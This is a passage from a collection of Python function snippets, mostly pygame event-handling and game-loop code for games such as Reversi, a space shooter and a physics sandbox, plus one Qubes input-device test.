draw_game_state(screen, gs)\n clock.tick(MAX_FPS)\n p.display.flip()", "def play(self):\n self.accept(\"wheel_up\", self.scrollindex, [-1] )\n self.accept(\"wheel_down\", self.scrollindex, [1] )\n self.accept(\"arrow_up\", self.scrollindex, [-1] )\n self.accept(\"arrow_down\", self.scrollindex, [1] )\n self.accept(\"enter\", self._click)\n if callable(self.data['exit']): self.accept(\"escape\", self.data['exit'])\n for item in self.canvas[\"items\"]: item['state']=DGG.NORMAL", "def run_game():\n mainBoard = get_new_board()\n resetBoard(mainBoard)\n showHints = False\n\n turn = random.choice(['computer', 'player'])\n\n # Draw the starting board and ask the player what color they want.\n draw_board(mainBoard)\n\n playerTile, computer_tile = enter_player_tile()\n # Make the Surface and Rect objects for the \"New Game\" and \"Hints\" buttons\n\n newGameSurf = FONT.render('New Game', True, TEXTCOLOR, TEXTBGCOLOR2)\n newGameRect = newGameSurf.get_rect()\n newGameRect.topright = (WINDOWWIDTH - 8, 10)\n\n hintsSurf = FONT.render('Hints', True, TEXTCOLOR, TEXTBGCOLOR2)\n hintsRect = hintsSurf.get_rect()\n hintsRect.topright = (WINDOWWIDTH - 8, 40)\n\n while True: # main game loop\n # Keep looping for player and computer's turns.\n if turn == 'player':\n # Player's turn:\n if get_valid_moves(mainBoard, playerTile) == []:\n # If it's the player's turn but they\n # can't move, then end the game.\n break\n\n movexy = None\n\n while movexy == None:\n # Keep looping until the player clicks on a valid space.\n # Determine which board data structure to use for display.\n if showHints:\n boardToDraw = get_board_with_valid_moves(mainBoard, playerTile)\n else:\n boardToDraw = mainBoard\n\n check_for_quit()\n for event in pygame.event.get(): # event handling loop\n if event.type == MOUSEBUTTONUP:\n # Handle mouse click events\n mousex, mousey = event.pos\n if newGameRect.collide_point((mousex, mousey)):\n # Start a new game\n return True\n elif hintsRect.collide_point((mousex, mousey)):\n # Toggle hints mode\n showHints = not showHints\n # movexy is set to a two-item tuple XY coordinate, or None value\n movexy = get_space_clicked(mousex, mousey)\n\n if movexy != None and not isValidMove(mainBoard, playerTile, movexy[0], movexy[1]):\n movexy = None\n\n # Draw the game board.\n draw_board(boardToDraw)\n draw_info(boardToDraw, playerTile, computer_tile, turn)\n\n # Draw the \"New Game\" and \"Hints\" buttons.\n DISPLAYSURF.blit(newGameSurf, newGameRect)\n DISPLAYSURF.blit(hintsSurf, hintsRect)\n\n MAINCLOCK.tick(FPS)\n pygame.display.update()\n\n # Make the move and end the turn.\n make_move(mainBoard, playerTile, movexy[0], movexy[1], True)\n if get_valid_moves(mainBoard, computer_tile) != []:\n # Only set for the computer's turn if it can make a move.\n turn = 'computer'\n else:\n # Computer's turn:\n if get_valid_moves(mainBoard, computer_tile) == []:\n # If it was set to be the computer's turn but\n # they can't move, then end the game.\n break\n\n # Draw the board.\n draw_board(mainBoard)\n draw_info(mainBoard, playerTile, computer_tile, turn)\n\n # Draw the \"New Game\" and \"Hints\" buttons.\n DISPLAYSURF.blit(newGameSurf, newGameRect)\n DISPLAYSURF.blit(hintsSurf, hintsRect)\n\n # Make it look like the computer is thinking by pausing a bit.\n pauseUntil = time.time() + random.randint(5, 15) * 0.1\n\n while time.time() < pauseUntil:\n pygame.display.update()\n\n # Make the move and end the turn.\n x, y = get_computer_move(mainBoard, computer_tile)\n make_move(mainBoard, computer_tile, x, y, True)\n\n if get_valid_moves(mainBoard, playerTile) != []:\n # Only set for the player's turn if they can make a move.\n turn = 'player'\n\n # Display the final score.\n draw_board(mainBoard)\n scores = get_score_of_board(mainBoard)\n # Determine the text of the message to display.\n\n if scores[playerTile] > scores[computer_tile]:\n text = 'You beat the computer by %s points! Congratulations!' % \\\n (scores[playerTile] - scores[computer_tile])\n elif scores[playerTile] < scores[computer_tile]:\n text = 'You lost. The computer beat you by %s points.' % \\\n (scores[computer_tile] - scores[playerTile])\n else:\n text = 'The game was a tie!'\n\n textSurf = FONT.render(text, True, TEXTCOLOR, TEXTBGCOLOR1)\n textRect = textSurf.get_rect()\n textRect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2))\n DISPLAYSURF.blit(textSurf, textRect)\n\n # Display the \"Play again?\" text with Yes and No buttons.\n text2Surf = BIGFONT.render('Play again?', True, TEXTCOLOR, TEXTBGCOLOR1)\n text2Rect = text2Surf.get_rect()\n text2Rect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2) + 50)\n\n # Make \"Yes\" button.\n yesSurf = BIGFONT.render('Yes', True, TEXTCOLOR, TEXTBGCOLOR1)\n yesRect = yesSurf.get_rect()\n yesRect.center = (int(WINDOWWIDTH / 2) - 60, int(WINDOWHEIGHT / 2) + 90)\n\n # Make \"No\" button.\n noSurf = BIGFONT.render('No', True, TEXTCOLOR, TEXTBGCOLOR1)\n noRect = noSurf.get_rect()\n noRect.center = (int(WINDOWWIDTH / 2) + 60, int(WINDOWHEIGHT / 2) + 90)\n\n while True:\n # Process events until the user clicks on Yes or No.\n check_for_quit()\n\n for event in pygame.event.get(): # event handling loop\n if event.type == MOUSEBUTTONUP:\n mousex, mousey = event.pos\n\n if yesRect.collide_point((mousex, mousey)):\n return True\n\n elif noRect.collide_point((mousex, mousey)):\n return False\n\n DISPLAYSURF.blit(textSurf, textRect)\n DISPLAYSURF.blit(text2Surf, text2Rect)\n DISPLAYSURF.blit(yesSurf, yesRect)\n DISPLAYSURF.blit(noSurf, noRect)\n\n pygame.display.update()\n MAINCLOCK.tick(FPS)", "def check_keydown_events(event, wof_settings, screen, hero, bombs):\n if event.key == pygame.K_RIGHT or event.key == pygame.K_d:\n hero.moving_right = True\n if event.key == pygame.K_LEFT or event.key == pygame.K_a:\n hero.moving_left = True\n if event.key == pygame.K_UP or event.key == pygame.K_w:\n hero.moving_up = True\n if event.key == pygame.K_DOWN or event.key == pygame.K_s:\n hero.moving_down = True\n elif event.key == pygame.K_SPACE:\n put_bomb(wof_settings,screen,hero,bombs)", "def check_events(si_settings, screen,stats,sb,play_button, ship,aliens, bullets):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, si_settings, screen, ship, bullets)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_x,mouse_y = pygame.mouse.get_pos()\n check_play_button(si_settings,screen,stats,sb,play_button,ship,aliens,bullets,mouse_x,mouse_y)", "def do_event(self, event):\n self.event = event\n self.event_type = event.type\n self.event_name = pygame.event.event_name(event.type)\n self.surf_list = []\n if event.type == QUIT:\n self.active = False\n \n elif event.type == KEYDOWN:\n self.event_key = event.key\n self.event_mod = event.mod\n self.event_unicode = event.unicode\n if event.key == K_ESCAPE:\n self.active = False\n elif event.key == K_RETURN:\n self.play(self)\n \n elif event.key in self.dirs:\n self.dir = np.array(self.dirs[event.key])\n self.pos += self.dir\n \n self.pos[0] = min(max(self.pos[0], 0), self.n-1)\n self.pos[1] = min(max(self.pos[1], 0), self.m-1)\n self.move(self)\n elif event.key in self.keys:\n self.keys[event.key](self)\n \n elif event.type == MOUSEMOTION:\n self.event_pos = event.pos\n self.event_rel = event.rel\n self.pos = self.get_index(*event.pos)\n if self.mouse_down:\n (x, y) = event.pos\n x -= self.dx//2\n y -= self.dy//2\n self.surf_list.append((self.cursor_img, (x, y)))\n \n elif event.type == MOUSEBUTTONDOWN:\n self.mouse_down = True\n (i, j) = self.get_index(*event.pos)\n t = self.T[i, j]\n if t != 0 and len(self.images)>0:\n self.cursor_img = self.images[t]\n self.T[i, j] = 0\n self.cursor_val = t\n \n elif event.type == MOUSEBUTTONUP:\n self.mouse_down = False\n (i, j) = self.get_index(*event.pos)\n self.pos = [i, j] \n t = self.T[i, j]\n if t == 0 and len(self.images) > 0:\n self.T[i, j] = self.cursor_val\n self.play(self)", "def switch_pattern(self):\n event = self.event_deque.popleft()\n event.reset()\n self.event_deque.append(event)\n self.last_switch = pygame.time.get_ticks()", "def get_event(self, event):\n\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_RETURN:\n print(self.game.current_room_no)\n if event.key == pg.K_BACKSPACE:\n print(self.game.room.room_no_list)\n if event.key == pg.K_a:\n self.is_moving_left = True \n self.move_left()\n if event.key == pg.K_d:\n self.is_moving_right = True \n self.move_right()\n if event.key == pg.K_w:\n self.is_moving_up = True\n self.move_up() \n if event.key == pg.K_s:\n self.is_moving_down = True\n self.move_down() \n if event.type == pg.KEYUP:\n if event.key == pg.K_a:\n if self.is_moving_right == True:\n self.is_moving_left = False \n self.move_right()\n else:\n self.is_moving_left = False \n self.stopX()\n if event.key == pg.K_d:\n if self.is_moving_left == True:\n self.is_moving_right = False\n self.move_left() \n else:\n self.is_moving_right = False \n self.stopX()\n if event.key == pg.K_w:\n if self.is_moving_down == True:\n self.is_moving_up = False \n self.move_down()\n else:\n self.is_moving_up = False \n self.stopY()\n if event.key == pg.K_s:\n if self.is_moving_up == True:\n self.is_moving_down = False \n self.move_up()\n else:\n self.is_moving_down = False \n self.stopY()\n\n if event.type == pg.MOUSEBUTTONDOWN and event.button == 1:\n self.is_shooting = True\n elif event.type == pg.MOUSEBUTTONUP and event.button == 1:\n self.is_shooting = False", "def play(self, event):\n\n # locate second column and row when player click on a square\n colrow_tuple = self.board.find_coords_of_selected_sq(event)\n\n # save the col and row as variable\n corner_two_col, corner_two_row = colrow_tuple[0], colrow_tuple[1]\n\n # calculations to get the key to help locate specific square on\n # the unused dictionary of squares left to play\n col_fl, row_fl = self.board.floor_of_row_col(event.x, event.y)\n rowcol_key = self.board.convert_to_key(col_fl, row_fl)\n\n try:\n self.unused_squares_dict[rowcol_key]\n except KeyError:\n return\n\n if self.player1_turn == True:\n self.add_to_player_sq(rowcol_key, self.player1.selected_sq)\n\n # delete from game unused dictionary of set\n self.delete_used_sq(rowcol_key)\n\n self.board.color_selected_sq(event,\n corner_two_col,\n corner_two_row,\n self.player1.color)\n\n # check game for 3 conditions: a tie, player1 win, or player2 win\n self.check_for_winner(self.player1.selected_sq, self.player1.name)\n\n # switch turn\n self.player1_turn = False\n\n else: # player2's turn\n self.board.color_selected_sq(event,\n corner_two_col,\n corner_two_row,\n self.player2.color)\n\n self.add_to_player_sq(rowcol_key, self.player2.selected_sq)\n self.delete_used_sq(rowcol_key)\n self.check_for_winner(self.player2.selected_sq, self.player2.name)\n self.player1_turn = True", "def check_events(wof_settings, screen, hero, bombs):\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT or (event.type == pygame.KEYUP and event.key == pygame.K_ESCAPE):\n wof_settings.running = False \n terminate()\n elif (event.type == pygame.KEYUP and event.key == pygame.K_b):\n wof_settings.running = False\n return 'back'\n elif (event.type == pygame.KEYUP and event.key == pygame.K_n):\n wof_settings.running = False\n return 'next'\n elif (event.type == pygame.KEYUP and event.key == pygame.K_BACKSPACE):\n wof_settings.running = False\n return 'replay'\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, wof_settings, screen, hero, bombs)\n # control the Hero movements\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, hero)", "def events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.set_selected(self.mouse_on_grid())\n if self.get_selected() is not None and event.type == pygame.KEYDOWN:\n self.event_seletect_moved(event)\n self.event_cell_update(event)", "def check_keydown_events(event,ai_settings,screen,ship,bullets,stats,aliens,sb):\n\t\n\tif event.key == pygame.K_RIGHT:\n\t\t# Mova a espaçonave para a direita\n\t\n\t\tship.set_moving_right(True)\n\t\n\telif event.key == pygame.K_LEFT:\n\t\t# Move a espaçonave para a esquerda\n\n\t\tship.set_moving_left(True)\n\n\telif event.key == pygame.K_SPACE:\n\n\t\tfire_bullet(ai_settings,screen,ship,bullets)\n\n\telif event.key == pygame.K_q:\n\t\tstats.file.stored_high_score(stats.high_score)\n\t\tsys.exit()\n\n\telif event.key == pygame.K_p:\n\t\tstart_game(ai_settings,screen,stats,ship,aliens,bullets,sb)", "def action_key_press(key, cur_key_type, cur_key, draw, phys, msg, timer, board, force):\n\n\n # delete any old mouse joints prior to dealing with the next keypress\n if key != \"m\" and msg.message != \"Mouse Move\" and cur_key_type == 0:\n for jn in phys.world.joints:\n if type(jn) is b2MouseJoint:\n phys.world.DestroyJoint(jn)\n\n if not key is None and key != \"\":\n if platform == \"linux\" or platform == \"linux2\":\n window = get_active_window_title()\n elif platform == \"win32\":\n window = gw.getActiveWindow().title\n\n if not \"Board\" in window and not \"Toolbar\" in window:\n pass\n else:\n if key == 255:\n pass\n\n elif key == \"r\" and cur_key_type == 0:\n # RESET SCREEN\n if sg.popup_yes_no(\"Are you sure you want to reset?\") == \"Yes\":\n draw.reset()\n msg = Messenger(phys.options[\"screen\"][\"fps\"], board)\n msg.set_message(\"Reset\")\n board.reset = True\n\n elif key == \"q\" and cur_key_type == 0:\n # QUIT\n msg.set_message(\"Quit\")\n val = sg.popup_yes_no(\"Are you sure you want to quit?\")\n if val == \"Yes\":\n board.run = False\n\n\n elif key == \"z\" and cur_key_type == 0:\n # SPAWN\n msg.set_message(\"Spawn\")\n phys.create_block()\n\n elif key == \"u\" and cur_key_type == 0:\n # draw delete blocks\n draw.reset()\n options = {\"Remove Joints\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"x\" and cur_key_type == 0:\n # draw delete blocks\n draw.reset()\n options = {\"Delete\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"p\" and cur_key_type == 0:\n # draw polygon\n draw.reset()\n # msg.set = {\"Dynamic Block\": draw.get_draw_type()}\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Dynamic Block\")\n\n elif key == \"g\" and cur_key_type == 0:\n # draw ground\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Static Block\")\n # options = {\"Static Block\": draw.get_draw_type()}\n\n # cur_key = msg.auto_set(options, key, force)\n\n elif key == \"i\" and cur_key_type == 0:\n # draw terrain\n\n draw.reset()\n options = {\"Generate Terrain\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n draw, phys, board = create_terrain(draw, phys, board=board)\n\n\n elif key == \"f\" and cur_key_type == 0:\n # draw fragments or select\n draw.reset()\n options = {\n \"Fragment Select\": SelectType.select} # \"Fragment Poly\": SelectType.draw, \"Frament Rectangle\": SelectType.rectangle,\n # \"Frament Select\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n\n elif key == \"1\" and cur_key_type == 0:\n # fire polygon\n draw.reset()\n options = {\"Create\": SelectType.select_point, \"Fire Block\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"4\" and cur_key_type == 0:\n # select\n # draw ground\n draw.reset()\n options = {\"Joint Update\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \";\" and cur_key_type == 0:\n # select\n # draw ground\n draw.reset()\n options = {\"Player Update\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"2\" and cur_key_type == 0:\n # Mouse Move\n draw.reset()\n options = {\"Rotate\": SelectType.player_select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"m\" and cur_key_type == 0:\n # Mouse Move\n draw.reset()\n options = {\"Mouse Move\": SelectType.select, \"Normal Move\": SelectType.null, \"Joint Move\": SelectType.null,\n \"Clone Move\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"t\" and cur_key_type == 0:\n # Mouse Move\n draw.reset()\n options = {\"Transform\": SelectType.player_select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"e\" and cur_key_type == 0:\n # draw ropes\n if sg.popup_yes_no(\"Are you sure you want to kill all blocks?\") == \"Yes\":\n draw.reset()\n phys.kill_all(static=False)\n msg.set_message(\"Remove Blocks\")\n cur_key = \"e\"\n\n elif key == \"v\" and cur_key_type == 0:\n # draw ropes\n draw.reset()\n msg.set_message(\"Set Spawn\")\n cur_key = \"v\"\n\n elif key == \"h\" and cur_key_type == 0:\n # draw fragment ALL players\n # cur_key = \"h\"\n msg.set_message(\"Frag All\")\n draw.reset()\n blocks = [bl for bl in phys.block_list if not bl.static is True and not bl.is_terrain is True]\n phys.fractal_block(blocks, create=False, board=board)\n\n elif key == \"k\" and cur_key_type == 0:\n # draw splitter sensor\n draw.reset()\n\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Force\")\n\n\n elif key == \"l\" and cur_key_type == 0:\n # draw splitter sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Splitter\")\n\n\n elif key == \"/\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Impulse\")\n\n\n elif key == \"'\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Goal\")\n\n elif key == \"{\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Spawner\")\n\n\n elif key == \"~\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Motor Switch\")\n\n elif key == \"&\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Water\")\n\n\n elif key == \"^\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Low Gravity\")\n\n\n elif key == \"#\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Gravity Switch\")\n\n elif key == \")\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Center\")\n\n elif key == \"%\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Sticky\")\n\n elif key == \"£\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Enlarger\")\n\n\n elif key == \"$\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Shrinker\")\n\n\n elif key == \"0\" and cur_key_type == 0:\n # pause physics\n phys.force_draw_all = not phys.force_draw_all\n options = {\"Draw All\": SelectType.null, \"Draw Set\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n\n\n elif key == \"o\" and cur_key_type == 0:\n # pause physics\n draw.reset()\n phys.pause = not phys.pause\n msg.set_message(\"Pause\" + (\" On\" if phys.pause is True else \" Off\"))\n cur_key = \"o\"\n\n elif key == \"*\" and cur_key_type == 0:\n # PICKLE BOARD\n name, blurb = save_gui()\n if not name is None:\n pickler(timer, phys, draw, board, msg, name, blurb)\n msg.set_message(\"State Saved\")\n cur_key = \"*\"\n draw.reset()\n\n elif key == \"-\":\n # LOAD BOARD\n\n timer, phys, draw, board, msg = load_gui(timer, phys, draw, board, msg, persistant=False)\n config = phys.config\n\n elif key == \"5\" and cur_key_type == 0:\n\n load_options()\n phys.change_config(board=board)\n\n elif key == \"6\" and cur_key_type == 0:\n\n board, phys, msg = update_background(board, phys, msg)\n\n\n elif key == \"j\" and cur_key_type == 0:\n # draw joints\n draw.reset()\n options = {\"Merge Blocks\": SelectType.select,\n \"Distance Joint\": SelectType.straight_join, \"Rope Joint\": SelectType.straight_join,\n \"Prismatic Joint\": SelectType.straight_join,\n \"Electric\": SelectType.line_join,\n \"Chain\": SelectType.line_join2,\n \"Weld Joint\": SelectType.straight_join, \"Wheel Joint\": SelectType.circle,\n \"Rotation Joint\": SelectType.rotation_select, \"Pulley\": SelectType.d_straight_join}\n\n cur_key = msg.auto_set(options, key, force)\n\n\n\n elif key == \"tab\":\n # Tab key press, this switches to move mode\n if cur_key_type == 0:\n cur_key_type = 1\n msg.set_message(\"Drawing Mode Enabled\")\n draw.reset()\n else:\n cur_key_type = 0\n msg.set_message(\"Create Mode Enabled\")\n draw.reset()\n\n\n # Drawing mode buttons\n\n elif key == \"`\" and cur_key_type == 1:\n # Mouse Move\n draw.reset()\n options = {\"Change Keys\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n\n elif key == \"1\" and cur_key_type == 1:\n # Mouse Move\n draw.reset()\n options = {\"Screen Move\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"2\" and cur_key_type == 1:\n # Mouse Move\n draw.reset()\n options = {\"Center Clicked\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n\n elif key == \"]\" and cur_key_type == 1:\n # draw polygon\n draw.reset()\n options = {\"Fire Bullet\": SelectType.bullet_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"[\" and cur_key_type == 1:\n # draw polygon\n draw.reset()\n options = {\"Choose Player\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"3\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Motor Forwards\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"4\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Motor Backwards\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"9\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n cur_key = key + str(SelectType.vector_direction.value)\n msg.set_message(\"Force\")\n\n elif key == \"0\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Relative Force\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"5\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Rotate CCW\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"6\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Rotate CW\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"7\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n cur_key = key + str(SelectType.vector_direction.value)\n msg.set_message(\"Impulse\")\n\n\n elif key == \"8\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Relative Impulse\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"!\" and cur_key_type == 1:\n \"\"\"\n Used to attach an relative impulse to a block\n \"\"\"\n board.translation = np.array([0, 0])\n\n # do move keypresses:\n if cur_key_type == 1:\n phys.do_keypress(key)\n\n return cur_key_type, cur_key, draw, phys, msg, timer, board", "def _check_events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n self._check_keyDown_events(event)\n elif event.type == pygame.KEYUP:\n self._check_keyUP_events(event)\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = pygame.mouse.get_pos()\n self._check_play_button(mouse_pos)", "def check_events_welcome_screen(ai_settings,grid, screen, buttons,screen_status, button_status, card_database_filter, user,action, player2):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n\n # If settings window is on\n if button_status.welcome_screen_settings_display == True:\n # Turn sound on\n if Rect(510, 333, 40, 40).collidepoint(pygame.mouse.get_pos()):\n ai_settings.sound_indicator = True\n # Turn sound off\n elif Rect(560, 333, 40, 40).collidepoint(pygame.mouse.get_pos()):\n ai_settings.sound_indicator = False\n # Turn music on\n elif Rect(510, 403, 40, 40).collidepoint(pygame.mouse.get_pos()):\n ai_settings.music_indicator = True\n # Turn music off\n elif Rect(560, 403, 40, 40).collidepoint(pygame.mouse.get_pos()):\n ai_settings.music_indicator = False\n\n # Change Theme\n elif Rect(510, 470, 140, 50).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Lith Harbor'\n change_bg_music('Lith Harbor')\n\n elif Rect(670, 470, 140, 50).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Leafre'\n change_bg_music('Leafre')\n\n elif Rect(510, 540, 140, 50).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Pantheon'\n change_bg_music('Pantheon')\n\n elif Rect(670, 540, 140, 50).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Ellinia'\n change_bg_music('Ellinia')\n\n # change AI speeding\n elif Rect(550, 620, 80, 50).collidepoint(pygame.mouse.get_pos()):\n ai_settings.AI_speed_indicator = '1000'\n\n elif Rect(650, 620, 80, 50).collidepoint(pygame.mouse.get_pos()):\n ai_settings.AI_speed_indicator = '2000'\n\n elif Rect(750, 620, 80, 50).collidepoint(pygame.mouse.get_pos()):\n ai_settings.AI_speed_indicator = '3000'\n\n # Quit settings window\n elif Rect(870, 300, 30, 30).collidepoint(pygame.mouse.get_pos()):\n button_status.welcome_screen_settings_display = False\n\n elif button_status.rules_display == True:\n # When we click on '>'\n if Rect(640, 37, 20, 20).collidepoint(pygame.mouse.get_pos()):\n if int(button_status.rules_page_id) < 4:\n button_status.rules_page_id = str(int(button_status.rules_page_id)+1)\n else:\n pass\n # When we click on '<'\n elif Rect(540, 37, 20, 20).collidepoint(pygame.mouse.get_pos()):\n if int(button_status.rules_page_id) > 1:\n button_status.rules_page_id = str(int(button_status.rules_page_id)-1)\n else:\n pass\n\n elif Rect(975, 35, 25, 25).collidepoint(pygame.mouse.get_pos()):\n button_status.rules_display = False\n\n else:\n # Click on single player\n if Rect(402, 269, 396, 62).collidepoint(pygame.mouse.get_pos()):\n screen_status.welcome_screen_display = False\n screen_status.prepare_screen_display = True\n if user.name == '':\n button_status.text_input_box_display = True\n else:\n pass\n # Click on multiplayer\n elif Rect(434, 370, 333, 61).collidepoint(pygame.mouse.get_pos()):\n screen_status.welcome_screen_display = False\n screen_status.lobby_screen_display = True\n player2.identity = 'pvp'\n if user.name == '':\n button_status.text_input_box_display = True\n else:\n pass\n #enter_as_network_client(ai_settings,grid, screen, buttons,screen_status, button_status, card_database_filter, user,action, player2)\n # Click on settings\n elif Rect(474, 469, 253, 62).collidepoint(pygame.mouse.get_pos()):\n button_status.welcome_screen_settings_display = True\n\n # Click on rules\n elif Rect(517, 570, 167, 61).collidepoint(pygame.mouse.get_pos()):\n button_status.rules_display = True\n\n # click on exit\n elif Rect(541, 670, 119, 61).collidepoint(pygame.mouse.get_pos()):\n sys.exit()", "def _check_event(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n sys.exit()\n elif event.key == pygame.K_SPACE:\n self.waiting = not self.waiting\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if self.waiting:\n x,y = pygame.mouse.get_pos()\n cell_addr_y = int(y/self.cell_width)\n cell_addr_x = int(x/self.cell_width)\n self.cells[cell_addr_y][cell_addr_x].update()", "def handle_keyboard_event(self, event, **kwargs):\n ok, collision = False, None\n key_pressed = pygame.key.get_pressed()\n if key_pressed[pygame.K_x]:\n sys.exit(0)\n if not self.select_from_menu:\n ok, collision = self._handle_keyboard_grid_event(key_pressed)\n else:\n self._handle_keyboard_menu_event(key_pressed)\n if key_pressed[pygame.K_RETURN]:\n event = self.menu.select_highlighted(source=self.battle_source, target=self.battle_target)\n self.menu.visible = False\n self.select_from_menu = False\n if event:\n kwargs[GHandler.EBUCKET].append(event)\n if not ok and collision:\n self.menu.visible = True\n self.select_from_menu = True\n self.battle_source = self.actor\n self.battle_target = collision.solid_object\n\n super(GameScene, self).handle_keyboard_event(event, **kwargs)", "def test_040_mouse_keyboard(self):\n self.allow_service('qubes.InputMouse')\n self.allow_service('qubes.InputKeyboard')\n self.setUpDevice(mouse_events + keyboard_events)\n dev_name = '{}: {}'.format(\n self.vm.name if hasattr(self, 'vm') else 'remote',\n 'Test input device')\n self.find_device_and_start_listener('pointer:' + dev_name)\n self.emit_event('REL_X', 1)\n self.emit_event('REL_X', 1)\n self.emit_event('REL_Y', 1)\n self.emit_event('REL_Y', 1)\n self.emit_click('BTN_LEFT')\n\n self.assertEvent(['RawMotion', '0', {'0': '1.00', '1': '0.00'}])\n self.assertEvent(['RawMotion', '0', {'0': '1.00', '1': '0.00'}])\n self.assertEvent(['RawMotion', '0', {'1': '1.00', '0': '0.00'}])\n self.assertEvent(['RawMotion', '0', {'1': '1.00', '0': '0.00'}])\n self.assertEvent(['RawButtonPress', '1', {}])\n self.assertEvent(['RawButtonRelease', '1', {}])\n\n self.find_device_and_start_listener('keyboard:' + dev_name)\n\n self.emit_click('KEY_A')\n self.emit_click('KEY_B')\n self.emit_click('KEY_C')\n self.emit_click('KEY_D')\n for _ in range(4):\n self.emit_click('KEY_BACKSPACE')\n\n for key in ('38', '56', '54', '40'):\n self.assertEvent(['RawKeyPress', key, {}])\n self.assertEvent(['RawKeyRelease', key, {}])\n for _ in range(4):\n self.assertEvent(['RawKeyPress', '22', {}])\n self.assertEvent(['RawKeyRelease', '22', {}])", "def _play(self, func):\n\n func()\n print('\\nhuman movement:\\n')\n print(self._board)\n\n while self._board.possible() != []:\n self._board.move_computer()\n print('\\ncomputer movement:\\n')\n print(self._board)\n if self._board.check_win():\n print('\\nwinner is computer')\n return\n\n func()\n print('\\nhuman movement:\\n')\n print(self._board)\n if self._board.check_win():\n print('\\nwinner is human')\n return\n print('\\nwinner is friendship :)')", 